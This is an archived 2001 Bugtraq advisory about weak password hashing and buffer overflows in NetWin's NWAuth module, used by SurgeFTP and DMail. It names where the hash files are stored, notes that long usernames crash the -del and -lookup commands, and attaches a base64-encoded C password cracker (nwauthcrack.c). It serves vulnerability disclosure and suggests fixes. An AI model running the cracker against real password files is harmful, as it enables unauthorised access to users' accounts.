[21721] in bugtraq
NetWin Authentication Module 3.0b password storage vulnerabilities / buffer overflows
daemon@ATHENA.MIT.EDU (ByteRage)
Fri Jul 20 11:14:36 2001
Message-ID: <20010720132417.23494.qmail@web13003.mail.yahoo.com>
Date: Fri, 20 Jul 2001 06:24:17 -0700 (PDT)
From: ByteRage <byterage@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-2138281715-995635457=:22341"
--0-2138281715-995635457=:22341
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
NetWin Authentication Module 3.0b password storage
vulnerabilities / buffer overflows
AFFECTED SYSTEMS
NWAuth module as used by
DMail, SurgeFTP, others... (cfr www.netwinsite.com)
I've tested SurgeFTP in particular
The source code for NWAuth 2.0 can be found at
http://www.netwinsite.com/dmail/nwauth.htm
The source is provided on all platforms and for
Windows and most Unix based platforms it is
pre-compiled, as nwauth.exe or nwauth.
DESCRIPTION
The 'NetWin Authentication module' which is used by
SurgeFTP, DMail and other programs uses a quite
'unusual' hashing algorithm to store the password
hashes. Because of the complexity of the hashing
algorithm, the users of NWAuth may not be aware of it,
but the algorithm is flawed in (at least) two ways :
1) the password hashes can be decrypted
2) one hash can match more than one password
So basically I'm saying that one user doesn't have one
password, but he can have a few million besides the
one that he was actually assigned. (no comment...)
Fortunately, SurgeFTP has some anti-hammering
techniques implemented to prevent bruteforcing.
As for the decryption, I've attached source code
(nwauthcrack.c) that will generate all possible
passwords for a given hash. The password hashes used
by fe SurgeFTP can be found within the files
\surgeftp\admin.dat (sysadmin password) &
\surgeftp\nwauth.clg (user passwords)
Storing the passwords using MD5 hashes would probably
be a better idea, maybe added up with a simple cipher
to prevent the average script kiddie from attacking
the passwordfile with canned tools. (this type of
hashing is done by Serv-U FTP)
And if one really wants to implement salting, then
append the username to the password and feed it into
the MD5 hashing algorithm, it has the same effect,
it's easier and much more secure.
=-=-
NWAuth also has alot of buffer overflows riddled
throughout the source code (especially older versions,
like 2.0), which might lead to serious flaws in
programs that use this module. Although version 2.0
probably contained much more of them, here are some
examples of buffer overflows which are still not fixed
in version 3.0b :
-> the nwauth -del command causes an access violation
when supplied with a very long username, this might
not be a big deal since only administrators are
supposed to delete users
-> the nwauth -lookup command causes an access
violation when supplied a username of about 1000
characters, this might be triggered by an attacker if
the program would pass this username from a "USER"
command
greetz,
[ByteRage] byterage@yahoo.com
[http://byterage.cjb.net]
__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/
--0-2138281715-995635457=:22341
Content-Type: application/octet-stream; name="nwauthcrack.c"
Content-Transfer-Encoding: base64
Content-Description: nwauthcrack.c
Content-Disposition: attachment; filename="nwauthcrack.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqDQogKiBud2F1dGhjcmFjay5jIC0g
TmV0V2luIEF1dGhlbnRpY2F0aW9uIE1vZHVsZSBwYXNzd29yZCBjcmFja2Vy
ICAgICoNCiAqIHRoZSBTdXJnZUZUUCBlbmNyeXB0ZWQgcGFzc3dvcmRzIGNh
biBiZSBmb3VuZCBpbiB0aGUgYWRtaW4uZGF0ICYgKg0KICogbndhdXRoLmNs
ZyBmaWxlcyBpbiB0aGUgbndhdXRoLmV4ZSBkaXJlY3RvcnkgICAgICAgICAg
ICAgICAgICAgICAqDQogKiBieSBbQnl0ZVJhZ2VdIDxieXRlcmFnZUB5YWhv
by5jb20+IFtodHRwOi8vd3d3LmJ5dGVyYWdlLmNqYi5uZXRdICoNCiAqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKi8NCg0KI2luY2x1ZGUgPHN0cmluZy5oPg0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQoNCkZJTEUgKmZoOw0KLyogdGhlIGZvbGxv
d2luZyB0YWJsZSBpbmRpY2VzIHJlZmVyIHRvIHRoZSBjaGFyYWN0ZXJzIG91
cg0KICAgZ2VuZXJhdGVkIHBhc3N3b3JkIG1heSBjb25zaXN0IG9mICh0cnVl
L2ZhbHNlKSwgc2luY2UNCiAgIHdlIGRvbid0IHdhbnQgdG8gZ28gaW50byB0
b28gbXVjaCB0cm91YmxlIHdoZW4gdHlwaW5nDQogICBldmVyeXRoaW5nIGlu
IDopICovDQpjb25zdCBjaGFyIG9rYXljaGFyc1syNTZdID0gew0KMCwwLDAs
MCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwNCjAsMCwwLDAsMCwwLDAsMCww
LDAsMCwwLDAsMCwwLDAsDQowLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLA0KMSwxLDEsMSwxLDEsMSwxLDEsMSwwLDAsMCwwLDAsMCwNCjAsMSwx
LDEsMSwxLDEsMSwxLDEsMSwxLDEsMSwxLDEsDQoxLDEsMSwxLDEsMSwxLDEs
MSwxLDEsMCwwLDAsMCwwLA0KMCwxLDEsMSwxLDEsMSwxLDEsMSwxLDEsMSwx
LDEsMSwNCjEsMSwxLDEsMSwxLDEsMSwxLDEsMSwwLDAsMCwwLDAsDQowLDAs
MCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLA0KMCwwLDAsMCwwLDAsMCww
LDAsMCwwLDAsMCwwLDAsMCwNCjAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsDQowLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLA0KMCww
LDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwNCjAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwLDAsMCwwLDAsDQowLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCww
LDAsMCwwLA0KMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwNCn07
DQoNCi8qIERFQ1JZUFRJT04gQUxHT1JJVEhNUyAqLw0KaW50IGVudW1wd2Rz
KHVuc2lnbmVkIGNoYXIgZW5jcnlwdGVkW10pIHsNCiAgaW50IGhlYXZ5Y3J5
cHQwOw0KICB1bnNpZ25lZCBpbnQgbnVtPTAsIGksIHg7DQogIHVuc2lnbmVk
IGNoYXIgalsyNTZdLCBkZWNyeXB0ZWRbMjU2XTsNCiAgZm9yKGk9MDsgaTwy
NTY7aSsrKSB7IGpbaV0gPSAwOyB9DQpicnV0ZToNCiAgaGVhdnljcnlwdDAg
PSAodW5zaWduZWQgY2hhcillbmNyeXB0ZWRbMV0qMjU1Kyh1bnNpZ25lZCBj
aGFyKWVuY3J5cHRlZFswXTsNCiAgZm9yKGk9MDsgaSsyIDwgc3RybGVuKGVu
Y3J5cHRlZCk7IGkrKykgew0KICAgIGZvcih4PWpbaV07IHggPCAyNTY7IHgr
Kykgew0KCSAgaWYgKCh4ICogKGhlYXZ5Y3J5cHQwKzEpICUgNDAgPT0gKGVu
Y3J5cHRlZFtpKzJdLTB4NDEpKSAmIG9rYXljaGFyc1t4XSkgew0KCSAgICBk
ZWNyeXB0ZWRbaV0gPSB4Ow0KCQlicmVhazsNCgkgIH0NCiAgICB9DQoJaWYg
KHggPT0gMjU2KSB7DQpuZXh0Og0KCSAgaWYgKGkgPT0gMCkgcmV0dXJuIG51
bTsNCgkgIGlmIChqW2ktMV0gPCAyNTYpIHsgaltpLTFdID0gZGVjcnlwdGVk
W2ktMV0rMTsgeCA9IGk7IH0gZWxzZSB7IGktLTsgZ290byBuZXh0OyB9DQoJ
ICBmb3IgKGk9eDsgaSA8IDI1NjsgaSsrKSB7IGpbaV0gPSAwOyB9DQoJICBn
b3RvIGJydXRlOw0KCX0NCgloZWF2eWNyeXB0MCArPSB4OyBoZWF2eWNyeXB0
MCAqPSAzOyBoZWF2eWNyeXB0MCAlPSAweDdEMDA7DQogIH0NCiAgZGVjcnlw
dGVkW2ldID0gJ1x4MDAnOw0KICBudW0rKzsNCiAgcHJpbnRmKCIlc1xuIiwg
ZGVjcnlwdGVkKTsgIA0KICBpZiAoaltpLTFdIDwgMjU2KSB7IGpbaS0xXSA9
IGRlY3J5cHRlZFtpLTFdKzE7IHggPSBpOyB9IGVsc2UgeyBpLS07IGdvdG8g
bmV4dDsgfQ0KICBmb3IgKGk9eDsgaSA8IDI1NjsgaSsrKSB7IGpbaV0gPSAw
OyB9DQogIGdvdG8gYnJ1dGU7DQp9DQovKiBERUNSWVBUSU9OIEFMR09SSVRI
TVMgRU5EICovDQoNCnZvaWQgbWFpbihpbnQgYXJnYywgY2hhciAqKiBhcmd2
KSB7DQogIGNoYXIgYnVmWzI1Nl07IGludCBrLCBsOw0KDQogIHByaW50Zigi
TmV0V2luIEF1dGhlbnRpY2F0aW9uIE1vZHVsZSBwYXNzd29yZCBjcmFja2Vy
IGJ5IFtCeXRlUmFnZV1cblxuIik7DQogIA0KICBpZiAoYXJnYyA8IDIpIHsg
cHJpbnRmKCJTeW50YXggOiAlcyA8cGFzc3dvcmQ+XG4iLCBhcmd2WzBdKTsg
cmV0dXJuOyB9DQogIHByaW50ZigiJXMgLT5cbiIsYXJndlsxXSk7DQogIA0K
ICBwcmludGYoIlxuJWQgcGFzc3dvcmRzIGZvdW5kIGZvciAlc1xuIixlbnVt
cHdkcyhhcmd2WzFdKSxhcmd2WzFdKTsNCn0NCg==
--0-2138281715-995635457=:22341--
